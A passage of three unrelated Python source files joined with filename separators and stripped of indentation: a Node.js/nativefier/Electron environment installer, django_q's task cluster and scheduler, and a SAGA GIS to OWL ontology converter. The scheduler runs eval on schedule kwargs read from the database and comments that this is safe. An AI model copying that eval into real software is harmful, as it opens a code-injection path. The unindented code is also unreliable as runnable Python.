installed_version = system.run_cmd(f'{NODE_BIN_PATH} --version', print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info(f'Node versions: installed ({installed_version}), cloud ({version})')
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return False
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
return False
def update_node(self, version: str, version_url: str, watcher: ProcessWatcher = None) -> bool:
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
if not os.path.exists(NODE_DIR_PATH):
return self._install_nodejs(version=version, version_url=version_url, watcher=watcher)
else:
installed_version = system.run_cmd('{} --version'.format(NODE_BIN_PATH), print_error=False)
if installed_version:
installed_version = installed_version.strip()
if installed_version.startswith('v'):
installed_version = installed_version[1:]
self.logger.info(f'Node versions: installed ({installed_version}), cloud ({version})')
if version != installed_version:
self.logger.info("The NodeJs installed version is different from the Cloud.")
return self._install_nodejs(version=version, version_url=version_url, watcher=watcher)
else:
self.logger.info("Node is already up to date")
return True
else:
self.logger.warning("Could not determine the current NodeJS installed version")
self.logger.info(f"Removing {NODE_DIR_PATH}")
try:
shutil.rmtree(NODE_DIR_PATH)
return self._install_nodejs(version=version, version_url=version_url, watcher=watcher)
except:
self.logger.error(f'Could not delete the dir {NODE_DIR_PATH}')
return False
def _install_node_lib(self, name: str, version: str, handler: ProcessHandler):
lib_repr = f"{name}{'@{}'.format(version) if version else ''}"
self.logger.info(f"Installing {lib_repr}")
if handler and handler.watcher:
handler.watcher.change_substatus(self.i18n['web.environment.install'].format(bold(lib_repr)))
proc = SimpleProcess([NPM_BIN_PATH, 'install', lib_repr], cwd=ENV_PATH, extra_paths=NODE_PATHS)
installed = handler.handle_simple(proc)[0]
if installed:
self.logger.info(f"{lib_repr} successfully installed")
return installed
def _install_nativefier(self, version: str, url: str, handler: ProcessHandler) -> bool:
self.logger.info(f"Checking if nativefier@{version} exists")
if not url or not self.http_client.exists(url):
self.logger.warning(f"The file {url} seems not to exist")
handler.watcher.show_message(title=self.i18n['message.file.not_exist'],
body=self.i18n['message.file.not_exist.body'].format(bold(url)),
type_=MessageType.ERROR)
return False
success = self._install_node_lib('nativefier', version, handler)
if success:
return self._is_nativefier_installed()
def _is_nativefier_installed(self) -> bool:
return os.path.exists(NATIVEFIER_BIN_PATH)
def _get_electron_url(self, version: str, base_url: str, is_x86_x64_arch: bool) -> str:
return base_url.format(version=version, arch='x64' if is_x86_x64_arch else 'ia32')
def check_electron_installed(self, version: str, base_url: str, is_x86_x64_arch: bool, widevine: bool) -> Dict[str, bool]:
self.logger.info(f"Checking if Electron {version} (widevine={widevine}) is installed")
res = {'electron': False, 'sha256': False}
if not os.path.exists(ELECTRON_CACHE_DIR):
self.logger.info(f"Electron cache directory {ELECTRON_CACHE_DIR} not found")
else:
files = {os.path.basename(f) for f in glob.glob(f'{ELECTRON_CACHE_DIR}/**', recursive=True) if os.path.isfile(f)}
if files:
electron_url = self._get_electron_url(version=version, base_url=base_url, is_x86_x64_arch=is_x86_x64_arch)
res['electron'] = os.path.basename(electron_url) in files
res['sha256'] = res['electron']
else:
self.logger.info(f"No Electron file found in '{ELECTRON_CACHE_DIR}'")
for att in ('electron', 'sha256'):
if res[att]:
self.logger.info(f'{att} ({version}) already downloaded')
return res
def _finish_task_download_settings(self):
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 100, None)
self.taskman.finish_task(self.task_read_settings_id)
def should_download_settings(self, web_config: dict) -> bool:
try:
settings_exp = int(web_config['environment']['cache_exp'])
except ValueError:
self.logger.error(f"Could not parse settings property 'environment.cache_exp': {web_config['environment']['cache_exp']}")
return True
if settings_exp <= 0:
self.logger.info("No expiration time configured for the environment settings cache file.")
return True
self.logger.info("Checking cached environment settings file")
if not os.path.exists(ENVIRONMENT_SETTINGS_CACHED_FILE):
self.logger.warning("Environment settings file not cached.")
return True
if not os.path.exists(ENVIRONMENT_SETTINGS_TS_FILE):
self.logger.warning("Environment settings file has no timestamp associated with it.")
return True
with open(ENVIRONMENT_SETTINGS_TS_FILE) as f:
env_ts_str = f.read()
try:
env_timestamp = datetime.fromtimestamp(float(env_ts_str))
except:
self.logger.error(f"Could not parse environment settings file timestamp: {env_ts_str}")
return True
expired = env_timestamp + timedelta(hours=settings_exp) <= datetime.utcnow()
if expired:
self.logger.info("Environment settings file has expired. It should be re-downloaded")
return True
else:
self.logger.info("Cached environment settings file is up to date")
return False
def read_cached_settings(self, web_config: dict) -> Optional[dict]:
if not self.should_download_settings(web_config):
with open(ENVIRONMENT_SETTINGS_CACHED_FILE) as f:
cached_settings_str = f.read()
try:
return yaml.safe_load(cached_settings_str)
except yaml.YAMLError:
self.logger.error(f'Could not parse the cache environment settings file: {cached_settings_str}')
def read_settings(self, web_config: dict, cache: bool = True) -> Optional[dict]:
if self.taskman:
self.taskman.register_task(self.task_read_settings_id, self.i18n['web.task.download_settings'], get_icon_path())
self.taskman.update_progress(self.task_read_settings_id, 1, None)
cached_settings = self.read_cached_settings(web_config) if cache else None
if cached_settings:
return cached_settings
try:
if self.taskman:
self.taskman.update_progress(self.task_read_settings_id, 10, None)
self.logger.info("Downloading environment settings")
res = self.http_client.get(URL_ENVIRONMENT_SETTINGS)
if not res:
self.logger.warning('Could not retrieve the environments settings from the cloud')
self._finish_task_download_settings()
return
try:
settings = yaml.safe_load(res.content)
nodejs_settings = settings.get('nodejs')
if nodejs_settings:
nodejs_settings['url'] = nodejs_settings['url'].format(version=nodejs_settings['version'])
except yaml.YAMLError:
self.logger.error(f'Could not parse environment settings: {res.text}')
self._finish_task_download_settings()
return
self.logger.info("Caching environment settings to disk")
cache_dir = os.path.dirname(ENVIRONMENT_SETTINGS_CACHED_FILE)
try:
Path(cache_dir).mkdir(parents=True, exist_ok=True)
except OSError:
self.logger.error(f"Could not create Web cache directory: {cache_dir}")
self.logger.info('Finished')
self._finish_task_download_settings()
return
cache_timestamp = datetime.utcnow().timestamp()
with open(ENVIRONMENT_SETTINGS_CACHED_FILE, 'w+') as f:
f.write(yaml.safe_dump(settings))
with open(ENVIRONMENT_SETTINGS_TS_FILE, 'w+') as f:
f.write(str(cache_timestamp))
self._finish_task_download_settings()
self.logger.info("Finished")
return settings
except requests.exceptions.ConnectionError:
self._finish_task_download_settings()
return
def _check_and_fill_electron(self, pkg: WebApplication, env: dict, local_config: dict, x86_x64: bool, widevine: bool, output: List[EnvironmentComponent]):
electron_settings = env['electron-wvvmp' if widevine else 'electron']
electron_version = electron_settings['version']
if not widevine and pkg.version and pkg.version != electron_version: # this feature does not support custom widevine electron at the moment
self.logger.info(f'A preset Electron version is defined for {pkg.url}: {pkg.version}')
electron_version = pkg.version
if not widevine and local_config['environment']['electron']['version']:
self.logger.warning(f"A custom Electron version will be used {electron_version} to install {pkg.url}")
electron_version = local_config['environment']['electron']['version']
electron_status = self.check_electron_installed(version=electron_version, base_url=electron_settings['url'],
is_x86_x64_arch=x86_x64, widevine=widevine)
electron_url = self._get_electron_url(version=electron_version, base_url=electron_settings['url'], is_x86_x64_arch=x86_x64)
output.append(EnvironmentComponent(name=electron_url.split('/')[-1],
version=electron_version,
url=electron_url,
size=self.http_client.get_content_length(electron_url),
id='electron',
update=not electron_status['electron'],
properties={'widevine': widevine}))
sha_url = electron_settings['sha_url'].format(version=electron_version)
output.append(EnvironmentComponent(name=sha_url.split('/')[-1],
version=electron_version,
url=sha_url,
size=self.http_client.get_content_length(sha_url),
id='electron_sha256',
update=not electron_status['electron'] or not electron_status['sha256'],
properties={'widevine': widevine}))
def _check_and_fill_node(self, env: dict, output: List[EnvironmentComponent]):
node = EnvironmentComponent(name=env['nodejs']['url'].split('/')[-1],
url=env['nodejs']['url'],
size=self.http_client.get_content_length(env['nodejs']['url']),
version=env['nodejs']['version'],
id='nodejs')
output.append(node)
native = self._map_nativefier_file(env['nativefier'])
output.append(native)
if not self.check_node_installed(env['nodejs']['version']):
node.update, native.update = True, True
else:
if not self._check_nativefier_installed(env['nativefier']):
native.update = True
def _check_nativefier_installed(self, nativefier_settings: dict) -> bool:
if not os.path.exists(NODE_MODULES_PATH):
self.logger.info(f'Node modules path {NODE_MODULES_PATH} not found')
return False
else:
if not self._is_nativefier_installed():
return False
installed_version = nativefier.get_version()
if installed_version:
installed_version = installed_version.strip()
self.logger.info(f"Nativefier versions: installed ({installed_version}), cloud ({nativefier_settings['version']})")
if nativefier_settings['version'] != installed_version:
self.logger.info("Installed nativefier version is different from cloud's. Changing version.")
return False
self.logger.info("Nativefier is already installed and up to date")
return True
def _map_nativefier_file(self, nativefier_settings: dict) -> EnvironmentComponent:
url = nativefier_settings['url'].format(version=nativefier_settings['version'])
return EnvironmentComponent(name=f"nativefier@{nativefier_settings['version']}",
url=url,
size=self.http_client.get_content_length(url),
version=nativefier_settings['version'],
id='nativefier')
def check_environment(self, env: dict, local_config: dict, app: WebApplication,
is_x86_x64_arch: bool, widevine: bool) -> List[EnvironmentComponent]:
components, check_threads = [], []
system_env = local_config['environment'].get('system', False)
if system_env:
self.logger.warning(f"Using system's nativefier to install {app.url}")
else:
node_check = Thread(target=self._check_and_fill_node, args=(env, components))
node_check.start()
check_threads.append(node_check)
elec_check = Thread(target=self._check_and_fill_electron, args=(app, env, local_config, is_x86_x64_arch, widevine, components))
elec_check.start()
check_threads.append(elec_check)
for t in check_threads:
t.join()
return components
def update(self, components: List[EnvironmentComponent], handler: ProcessHandler) -> bool:
self.logger.info('Updating environment')
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
comp_map = {c.id: c for c in components}
node_data = comp_map.get('nodejs')
nativefier_data = comp_map.get('nativefier')
if node_data:
if not self._install_nodejs(version=node_data.version, version_url=node_data.url, watcher=handler.watcher):
return False
if not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
else:
if nativefier_data and not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
self.logger.info('Environment successfully updated')
return True
|
cluster.py
|
# Future
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from time import sleep
# external
import arrow
import ast
# Standard
import importlib
import signal
import socket
import traceback
# Django
from django import db
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from multiprocessing import Event, Process, Value, current_process
# Local
import django_q.tasks
from django_q.brokers import get_broker
from django_q.conf import Conf, logger, psutil, get_ppid, error_reporter
from django_q.models import Task, Success, Schedule
from django_q.queues import Queue
from django_q.signals import pre_execute
from django_q.signing import SignedPackage, BadSignature
from django_q.status import Stat, Status
class Cluster(object):
def __init__(self, broker=None):
self.broker = broker or get_broker()
self.sentinel = None
self.stop_event = None
self.start_event = None
self.pid = current_process().pid
self.host = socket.gethostname()
self.timeout = Conf.TIMEOUT
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
def start(self):
# Start Sentinel
self.stop_event = Event()
self.start_event = Event()
self.sentinel = Process(target=Sentinel,
args=(self.stop_event, self.start_event, self.broker, self.timeout))
self.sentinel.start()
logger.info(_('Q Cluster-{} starting.').format(self.pid))
while not self.start_event.is_set():
sleep(0.1)
return self.pid
def stop(self):
if not self.sentinel.is_alive():
return False
logger.info(_('Q Cluster-{} stopping.').format(self.pid))
self.stop_event.set()
self.sentinel.join()
logger.info(_('Q Cluster-{} has stopped.').format(self.pid))
self.start_event = None
self.stop_event = None
return True
def sig_handler(self, signum, frame):
logger.debug(_('{} got signal {}').format(current_process().name,
Conf.SIGNAL_NAMES.get(signum, 'UNKNOWN')))
self.stop()
@property
def stat(self):
if self.sentinel:
return Stat.get(self.pid)
return Status(self.pid)
@property
def is_starting(self):
return self.stop_event and self.start_event and not self.start_event.is_set()
@property
def is_running(self):
return self.stop_event and self.start_event and self.start_event.is_set()
@property
def is_stopping(self):
return self.stop_event and self.start_event and self.start_event.is_set() and self.stop_event.is_set()
@property
def has_stopped(self):
return self.start_event is None and self.stop_event is None and self.sentinel
class Sentinel(object):
def __init__(self, stop_event, start_event, broker=None, timeout=Conf.TIMEOUT, start=True):
# Make sure we catch signals for the pool
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_DFL)
self.pid = current_process().pid
self.parent_pid = get_ppid()
self.name = current_process().name
self.broker = broker or get_broker()
self.reincarnations = 0
self.tob = timezone.now()
self.stop_event = stop_event
self.start_event = start_event
self.pool_size = Conf.WORKERS
self.pool = []
self.timeout = timeout
self.task_queue = Queue(maxsize=Conf.QUEUE_LIMIT) if Conf.QUEUE_LIMIT else Queue()
self.result_queue = Queue()
self.event_out = Event()
self.monitor = None
self.pusher = None
if start:
self.start()
def start(self):
self.broker.ping()
self.spawn_cluster()
self.guard()
def status(self):
if not self.start_event.is_set() and not self.stop_event.is_set():
return Conf.STARTING
elif self.start_event.is_set() and not self.stop_event.is_set():
if self.result_queue.empty() and self.task_queue.empty():
return Conf.IDLE
return Conf.WORKING
elif self.stop_event.is_set() and self.start_event.is_set():
if self.monitor.is_alive() or self.pusher.is_alive() or len(self.pool) > 0:
return Conf.STOPPING
return Conf.STOPPED
def spawn_process(self, target, *args):
"""
:type target: function or class
"""
p = Process(target=target, args=args)
p.daemon = True
if target == worker:
p.daemon = Conf.DAEMONIZE_WORKERS
p.timer = args[2]
self.pool.append(p)
p.start()
return p
def spawn_pusher(self):
return self.spawn_process(pusher, self.task_queue, self.event_out, self.broker)
def spawn_worker(self):
self.spawn_process(worker, self.task_queue, self.result_queue, Value('f', -1), self.timeout)
def spawn_monitor(self):
return self.spawn_process(monitor, self.result_queue, self.broker)
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
db.connections.close_all() # Close any old connections
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_("reincarnated monitor {} after sudden death").format(process.name))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_("reincarnated pusher {} after sudden death").format(process.name))
else:
self.pool.remove(process)
self.spawn_worker()
if process.timer.value == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warn(_("reincarnated worker {} after timeout").format(process.name))
elif int(process.timer.value) == -2:
logger.info(_("recycled worker {}").format(process.name))
else:
logger.error(_("reincarnated worker {} after death").format(process.name))
self.reincarnations += 1
def spawn_cluster(self):
self.pool = []
Stat(self).save()
db.connection.close()
# spawn worker pool
for __ in range(self.pool_size):
self.spawn_worker()
# spawn auxiliary
self.monitor = self.spawn_monitor()
self.pusher = self.spawn_pusher()
# set worker cpu affinity if needed
if psutil and Conf.CPU_AFFINITY:
set_cpu_affinity(Conf.CPU_AFFINITY, [w.pid for w in self.pool])
def guard(self):
logger.info(_('{} guarding cluster at {}').format(current_process().name, self.pid))
self.start_event.set()
Stat(self).save()
logger.info(_('Q Cluster-{} running.').format(self.parent_pid))
counter = 0
cycle = Conf.GUARD_CYCLE # guard loop sleep in seconds
# Guard loop. Runs at least once
while not self.stop_event.is_set() or not counter:
# Check Workers
for p in self.pool:
with p.timer.get_lock():
# Are you alive?
if not p.is_alive() or p.timer.value == 0:
self.reincarnate(p)
continue
# Decrement timer if work is being done
if p.timer.value > 0:
p.timer.value -= cycle
# Check Monitor
if not self.monitor.is_alive():
self.reincarnate(self.monitor)
# Check Pusher
if not self.pusher.is_alive():
self.reincarnate(self.pusher)
# Call scheduler once a minute (or so)
counter += cycle
if counter >= 30 and Conf.SCHEDULER:
counter = 0
scheduler(broker=self.broker)
# Save current status
Stat(self).save()
sleep(cycle)
self.stop()
def stop(self):
Stat(self).save()
name = current_process().name
logger.info(_('{} stopping cluster processes').format(name))
# Stopping pusher
self.event_out.set()
# Wait for it to stop
while self.pusher.is_alive():
sleep(0.1)
Stat(self).save()
# Put poison pills in the queue
for __ in range(len(self.pool)):
self.task_queue.put('STOP')
self.task_queue.close()
# wait for the task queue to empty
self.task_queue.join_thread()
# Wait for all the workers to exit
while len(self.pool):
for p in self.pool:
if not p.is_alive():
self.pool.remove(p)
sleep(0.1)
Stat(self).save()
# Finally stop the monitor
self.result_queue.put('STOP')
self.result_queue.close()
# Wait for the result queue to empty
self.result_queue.join_thread()
logger.info(_('{} waiting for the monitor.').format(name))
# Wait for everything to close or time out
count = 0
if not self.timeout:
self.timeout = 30
while self.status() == Conf.STOPPING and count < self.timeout * 10:
sleep(0.1)
Stat(self).save()
count += 1
# Final status
Stat(self).save()
def pusher(task_queue, event, broker=None):
"""
Pulls tasks of the broker and puts them in the task queue
:type task_queue: multiprocessing.Queue
:type event: multiprocessing.Event
"""
if not broker:
broker = get_broker()
logger.info(_('{} pushing tasks at {}').format(current_process().name, current_process().pid))
while True:
try:
task_set = broker.dequeue()
except Exception as e:
logger.error(e, traceback.format_exc())
# broker probably crashed. Let the sentinel handle it.
sleep(10)
break
if task_set:
for task in task_set:
ack_id = task[0]
# unpack the task
try:
task = SignedPackage.loads(task[1])
except (TypeError, BadSignature) as e:
logger.error(e, traceback.format_exc())
broker.fail(ack_id)
continue
task['ack_id'] = ack_id
task_queue.put(task)
logger.debug(_('queueing from {}').format(broker.list_key))
if event.is_set():
break
logger.info(_("{} stopped pushing tasks").format(current_process().name))
def monitor(result_queue, broker=None):
"""
Gets finished tasks from the result queue and saves them to Django
:type result_queue: multiprocessing.Queue
"""
if not broker:
broker = get_broker()
name = current_process().name
logger.info(_("{} monitoring at {}").format(name, current_process().pid))
for task in iter(result_queue.get, 'STOP'):
# save the result
if task.get('cached', False):
save_cached(task, broker)
else:
save_task(task, broker)
# acknowledge result
ack_id = task.pop('ack_id', False)
if ack_id and (task['success'] or task.get('ack_failure', False)):
broker.acknowledge(ack_id)
# log the result
if task['success']:
# log success
logger.info(_("Processed [{}]").format(task['name']))
else:
# log failure
logger.error(_("Failed [{}] - {}").format(task['name'], task['result']))
logger.info(_("{} stopped monitoring results").format(name))
def worker(task_queue, result_queue, timer, timeout=Conf.TIMEOUT):
"""
Takes a task from the task queue, tries to execute it and puts the result back in the result queue
:type task_queue: multiprocessing.Queue
:type result_queue: multiprocessing.Queue
:type timer: multiprocessing.Value
"""
name = current_process().name
logger.info(_('{} ready for work at {}').format(name, current_process().pid))
task_count = 0
if timeout is None:
timeout = -1
# Start reading the task queue
for task in iter(task_queue.get, 'STOP'):
result = None
timer.value = -1 # Idle
task_count += 1
# Get the function from the task
logger.info(_('{} processing [{}]').format(name, task['name']))
f = task['func']
# if it's not an instance try to get it from the string
if not callable(task['func']):
try:
module, func = f.rsplit('.', 1)
m = importlib.import_module(module)
f = getattr(m, func)
except (ValueError, ImportError, AttributeError) as e:
result = (e, False)
if error_reporter:
error_reporter.report()
# We're still going
if not result:
db.close_old_connections()
timer_value = task['kwargs'].pop('timeout', timeout)
# signal execution
pre_execute.send(sender="django_q", func=f, task=task)
# execute the payload
timer.value = timer_value # Busy
try:
res = f(*task['args'], **task['kwargs'])
result = (res, True)
except Exception as e:
result = ('{} : {}'.format(e, traceback.format_exc()), False)
if error_reporter:
error_reporter.report()
with timer.get_lock():
# Process result
task['result'] = result[0]
task['success'] = result[1]
task['stopped'] = timezone.now()
result_queue.put(task)
timer.value = -1 # Idle
# Recycle
if task_count == Conf.RECYCLE:
timer.value = -2 # Recycled
break
logger.info(_('{} stopped doing work').format(name))
def save_task(task, broker):
"""
Saves the task package to Django or the cache
"""
# SAVE LIMIT < 0 : Don't save success
if not task.get('save', Conf.SAVE_LIMIT >= 0) and task['success']:
return
# enqueues next in a chain
if task.get('chain', None):
django_q.tasks.async_chain(task['chain'], group=task['group'], cached=task['cached'], sync=task['sync'], broker=broker)
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning
db.close_old_connections()
try:
if task['success'] and 0 < Conf.SAVE_LIMIT <= Success.objects.count():
Success.objects.last().delete()
# check if this task has previous results
if Task.objects.filter(id=task['id'], name=task['name']).exists():
existing_task = Task.objects.get(id=task['id'], name=task['name'])
# only update the result if it hasn't succeeded yet
if not existing_task.success:
existing_task.stopped = task['stopped']
existing_task.result = task['result']
existing_task.success = task['success']
existing_task.save()
else:
Task.objects.create(id=task['id'],
name=task['name'],
func=task['func'],
hook=task.get('hook'),
args=task['args'],
kwargs=task['kwargs'],
started=task['started'],
stopped=task['stopped'],
result=task['result'],
group=task.get('group'),
success=task['success']
)
except Exception as e:
logger.error(e)
def save_cached(task, broker):
task_key = '{}:{}'.format(broker.list_key, task['id'])
timeout = task['cached']
if timeout is True:
timeout = None
try:
group = task.get('group', None)
iter_count = task.get('iter_count', 0)
# if it's a group append to the group list
if group:
group_key = '{}:{}:keys'.format(broker.list_key, group)
group_list = broker.cache.get(group_key) or []
# if it's an iter group, check if we are ready
if iter_count and len(group_list) == iter_count - 1:
group_args = '{}:{}:args'.format(broker.list_key, group)
# collate the results into a Task result
results = [SignedPackage.loads(broker.cache.get(k))['result'] for k in group_list]
results.append(task['result'])
task['result'] = results
task['id'] = group
task['args'] = SignedPackage.loads(broker.cache.get(group_args))
task.pop('iter_count', None)
task.pop('group', None)
if task.get('iter_cached', None):
task['cached'] = task.pop('iter_cached', None)
save_cached(task, broker=broker)
else:
save_task(task, broker)
broker.cache.delete_many(group_list)
broker.cache.delete_many([group_key, group_args])
return
# save the group list
group_list.append(task_key)
broker.cache.set(group_key, group_list, timeout)
# async_task next in a chain
if task.get('chain', None):
django_q.tasks.async_chain(task['chain'], group=group, cached=task['cached'], sync=task['sync'], broker=broker)
# save the task
broker.cache.set(task_key,
SignedPackage.dumps(task),
timeout)
except Exception as e:
logger.error(e)
def scheduler(broker=None):
"""
Creates a task from a schedule at the scheduled time and schedules next run
"""
if not broker:
broker = get_broker()
db.close_old_connections()
try:
with db.transaction.atomic():
for s in Schedule.objects.select_for_update().exclude(repeats=0).filter(next_run__lt=timezone.now()):
args = ()
kwargs = {}
# get args, kwargs and hook
if s.kwargs:
try:
# eval should be safe here because dict()
kwargs = eval('dict({})'.format(s.kwargs))
except SyntaxError:
kwargs = {}
if s.args:
args = ast.literal_eval(s.args)
# single value won't eval to tuple, so:
if type(args) != tuple:
args = (args,)
q_options = kwargs.get('q_options', {})
if s.hook:
q_options['hook'] = s.hook
# set up the next run time
if not s.schedule_type == s.ONCE:
next_run = arrow.get(s.next_run)
while True:
if s.schedule_type == s.MINUTES:
next_run = next_run.replace(minutes=+(s.minutes or 1))
elif s.schedule_type == s.HOURLY:
next_run = next_run.replace(hours=+1)
elif s.schedule_type == s.DAILY:
next_run = next_run.replace(days=+1)
elif s.schedule_type == s.WEEKLY:
next_run = next_run.replace(weeks=+1)
elif s.schedule_type == s.MONTHLY:
next_run = next_run.replace(months=+1)
elif s.schedule_type == s.QUARTERLY:
next_run = next_run.replace(months=+3)
elif s.schedule_type == s.YEARLY:
next_run = next_run.replace(years=+1)
if Conf.CATCH_UP or next_run > arrow.utcnow():
break
s.next_run = next_run.datetime
s.repeats += -1
# send it to the cluster
q_options['broker'] = broker
q_options['group'] = q_options.get('group', s.name or s.id)
kwargs['q_options'] = q_options
s.task = django_q.tasks.async_task(s.func, *args, **kwargs)
# log it
if not s.task:
logger.error(
_('{} failed to create a task from schedule [{}]').format(current_process().name,
s.name or s.id))
else:
logger.info(
_('{} created a task from schedule [{}]').format(current_process().name, s.name or s.id))
# default behavior is to delete a ONCE schedule
if s.schedule_type == s.ONCE:
if s.repeats < 0:
s.delete()
continue
# but not if it has a positive repeats
s.repeats = 0
# save the schedule
s.save()
except Exception as e:
logger.error(e)
def set_cpu_affinity(n, process_ids, actual=not Conf.TESTING):
"""
Sets the cpu affinity for the supplied processes.
Requires the optional psutil module.
:param int n: affinity
:param list process_ids: a list of pids
:param bool actual: Test workaround for Travis not supporting cpu affinity
"""
# check if we have the psutil module
if not psutil:
logger.warning('Skipping cpu affinity because psutil was not found.')
return
# check if the platform supports cpu_affinity
if actual and not hasattr(psutil.Process(process_ids[0]), 'cpu_affinity'):
logger.warning('Faking cpu affinity because it is not supported on this platform')
actual = False
# get the available processors
cpu_list = list(range(psutil.cpu_count()))
# affinities of 0 or gte cpu_count, equals to no affinity
if not n or n >= len(cpu_list):
return
# spread the workers over the available processors.
index = 0
for pid in process_ids:
affinity = []
for k in range(n):
if index == len(cpu_list):
index = 0
affinity.append(cpu_list[index])
index += 1
if psutil.pid_exists(pid):
p = psutil.Process(pid)
if actual:
p.cpu_affinity(affinity)
logger.info(_('{} will use cpu {}').format(pid, affinity))
|
saga2owl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/1/3 16:04
from owlready2 import *
import json
import re
from JSON2OWL.OwlConvert.OwlUtils import OWLUtils
from JSON2OWL.OwlConvert.Preprocessor import Preprocessor
from rdflib import BNode, RDF, Graph, URIRef, Namespace, Literal
from rdflib.collection import Collection
module_uri = 'http://www.egc.org/ont/process/saga'
onto = get_ontology(module_uri)
# onto, skos, dcterms, props = OWLUtils.load_common(onto)
onto, sh, skos, dcterms, props, foaf = OWLUtils.load_common(onto)
onto, geospatial = OWLUtils.load_geo_vocabl(onto)
onto, gb, task, data, cyber, context = OWLUtils.load_common_for_process_tool(onto)
# rdf namespaces
Data, Cyber, Skos, Sh, Geo, Sf, Process = OWLUtils.rdfnamespaces()
print('ontologies imported')
# sh:declare
# TODO TEST
# OWLUtils.declear_prefix('ns_saga', onto)
with onto:
# print(gb.GeoprocessingFunctionality)
class SagaTool(gb.GeoprocessingFunctionality):
pass
class SagaInput(cyber.Input):
pass
class SagaOutput(cyber.Output):
pass
class SagaOption(cyber.Option):
pass
# class SagaConstraint(gb.Constraint):
# pass
class SagaAvailableChoice(cyber.AvailableChoice):
pass
onto.metadata.creator.append('houzhiwei')
onto.metadata.title.append('SAGA GIS')
onto.metadata.versionInfo.append('7.3.0')
import datetime
onto.metadata.created.append(datetime.datetime.today())
g = default_world.as_rdflib_graph()
def get_property(option, prop_type):
"""
根据配置查找对应的属性,没有则创建新的属性
Args:
option: property name
prop_type: ObjectProperty or DataProperty
Returns: created property name
"""
config = OWLUtils.get_config(module_path + '/config.ini')
_prop = OWLUtils.get_option(config, 'saga', option)
if _prop is None:
if onto.__getattr__(option) is None:
OWLUtils.create_onto_class(onto, option, prop_type)
return option
else:
return _prop
def get_format(option):
"""
get mapping format
对应的数据格式
"""
config = OWLUtils.get_config(module_path + '/config.ini')
_prop = OWLUtils.get_option(config, 'format', option)
return _prop
def handle_inout(tool, item_value, in_or_out):
"""
handle input & output
Args:
tool:
item_value:
in_or_out:
Returns:
"""
for ioD in item_value:
# print(ioD)
io_name = ioD['name']
if io_name is None:
io_name = in_or_out
_name = Preprocessor.io_name(io_name, onto)
param_rdf = None
if in_or_out == 'input':
param = SagaInput(_name, prefLabel=locstr(io_name, lang='en'))
# param = SagaInput(0,prefLabel=locstr(io_name, lang='en')) # blank node prefix with _:
tool.input.append(param)
param.isInput = True
# rdflib
param_rdf = URIRef(param.iri)
with onto:
g.add((param_rdf, RDF.type, Sh.NodeShape))
g.add((param_rdf, RDF.type, URIRef(SagaInput.iri)))
else:
param = SagaOutput(_name, prefLabel=locstr(io_name, lang='en'))
# param =SagaOutput(0, prefLabel=locstr(io_name, lang='en'))
tool.output.append(param)
param.isOutput = True
# rdflib
param_rdf = URIRef(param.iri)
with onto:
g.add((param_rdf, RDF.type, Sh.NodeShape))
g.add((param_rdf, RDF.type, URIRef(SagaOutput.iri)))
if ioD['dataType']:
vr = re.match("[a-zA-Z ]+ (?=\([a-zA-Z ]+\))?", ioD['dataType'])
dformat = vr.group().strip()
if not get_format(dformat):
continue
param.supportsDataFormat.append(data[get_format(dformat)])
# rdflib
formatshape = g.BNode()
with onto:
g.add((formatshape, RDF.type, Sh.PropertyShape))
g.add((formatshape, Sh.path, Cyber.supportsDataFormat))
g.add((param_rdf, Sh.property, formatshape))
formats = g.BNode()
with onto:
g.add((formats, RDF.first, [data[get_format(dformat)]]))
g.add((formats, RDF.rest, RDF.nil))
c = Collection(g, formats)
g.add((formatshape, Sh['in'], c))
param.identifier = ioD['name']
param.description.append(ioD['description'])
param.flag = ioD['flag']
param.isOptional = ioD['isOptional']
OWLUtils.link_to_domain_concept(param, io_name.replace('_', ' '))
# shacl
pshape = Sh.PropertyShape(0)
pshape.path = onto.dataContent
if not ioD['isOptional']:
pshape.minCount = 1
pshape.message.append(ioD['name'] + " is required!")
def handle_options(tool, option, _onto):
name = option['name']
if name is None:
name = 'option'
_name = Preprocessor.io_name(Preprocessor.name_underline(name), _onto)
op = SagaOption(_name, prefLabel=locstr(name, lang='en'))
tool.option.append(op)
if option['description'] != '-':
op.description = option['description']
op.flag = option['flag']
op.identifier = name
constraints = option['constraints']
# shacl
pshape = Sh.PropertyShape(0)
pshape.path.append(_onto.dataContent)
if constraints:
if 'fields_des' in constraints.keys() and constraints['fields_des']:
op.description.append(constraints['fields_des'])
else:
if 'minimum' in constraints.keys() and constraints['minimum']:
op.minimum = constraints['minimum']
pshape.minExclusive = constraints['minimum']
if 'defaultValue' in constraints.keys() and constraints['defaultValue']:
op.defaultValue = constraints['defaultValue']
pshape.defaultValue = constraints['defaultValue']
if 'maximum' in constraints.keys() and constraints['maximum']:
op.maximum = constraints['maximum']
pshape.maxInclusive = constraints['maximum']
op.datatypeInString.append(option['dataType'])
pshape.datatype = [OWLUtils.get_datatype_iris(option['dataType'])]
op.datatype.append(OWLUtils.get_datatype_iris(option['dataType']))
if 'availableChoices' in constraints.keys() and constraints['availableChoices']:
c = []
for achoice in constraints['availableChoices']:
c.append(achoice['choice'])
with _onto:
g.add((pshape, Sh['in'], c))
OWLUtils.handle_choices(op, name, constraints['availableChoices'], SagaAvailableChoice, _onto)
def handle_task(tool, tool_name, en_str, _keywords, desc):
